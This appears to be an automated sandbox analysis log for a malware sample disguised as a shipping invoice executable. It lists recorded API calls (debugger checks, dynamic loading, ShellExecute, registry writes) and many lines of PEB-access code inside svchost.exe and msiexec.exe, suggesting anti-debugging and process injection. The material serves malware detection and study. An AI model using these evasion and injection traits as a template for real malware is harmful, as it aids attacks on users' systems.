Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,

0_2_0040D6D0

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 4_2_004459F2 GetLastError,RegQueryValueExW,RegCloseKey,GlobalFree,RegCreateKeyExW,RegSetValueExW,lstrlenW,RegSetValueExW,RegCloseKey,memset,OutputDebugStringW,SetLastError,

4_2_004459F2

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,

0_2_0040EB70

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_03E38518 mov eax, dword ptr fs:[00000030h]	0_2_03E38518
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_03E384B8 mov eax, dword ptr fs:[00000030h]	0_2_03E384B8
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_03E36ED8 mov eax, dword ptr fs:[00000030h]	0_2_03E36ED8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]	2_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]	2_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h]	2_2_038EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h]	2_2_038B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]	2_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]	2_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038663FF mov eax, dword ptr fs:[00000030h]	2_2_038663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h]	2_2_0382C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h]	2_2_03850310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov ecx, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h]	2_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h]	2_2_038D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390634F mov eax, dword ptr fs:[00000030h]	2_2_0390634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D437C mov eax, dword ptr fs:[00000030h]	2_2_038D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]	2_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]	2_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]	2_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]	2_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039062D6 mov eax, dword ptr fs:[00000030h]	2_2_039062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]	2_2_0382823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h]	2_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h]	2_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390625D mov eax, dword ptr fs:[00000030h]	2_2_0390625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]	2_2_0382A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]	2_2_03836259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]	2_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]	2_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]	2_2_0382826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]	2_2_03870185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]	2_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]	2_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]	2_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]	2_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]	2_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]	2_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]	2_2_039061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]	2_2_038601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]	2_2_038F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]	2_2_03860124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]	2_2_0382C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h]	2_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]	2_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]	2_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]	2_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]	2_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]	2_2_0383208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038280A0 mov eax, dword ptr fs:[00000030h]	2_2_038280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h]	2_2_038C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]	2_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]	2_2_038B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0382A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]	2_2_038380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h]	2_2_038B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0382C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]	2_2_038720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h]	2_2_038B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]	2_2_0382A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]	2_2_0382C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h]	2_2_038C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]	2_2_03832050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h]	2_2_038B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]	2_2_0385C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D678E mov eax, dword ptr fs:[00000030h]	2_2_038D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]	2_2_038307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E47A0 mov eax, dword ptr fs:[00000030h]	2_2_038E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]	2_2_038B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_038BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]	2_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]	2_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]	2_2_0386C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]	2_2_03830710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]	2_2_03860710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]	2_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]	2_2_0386C720
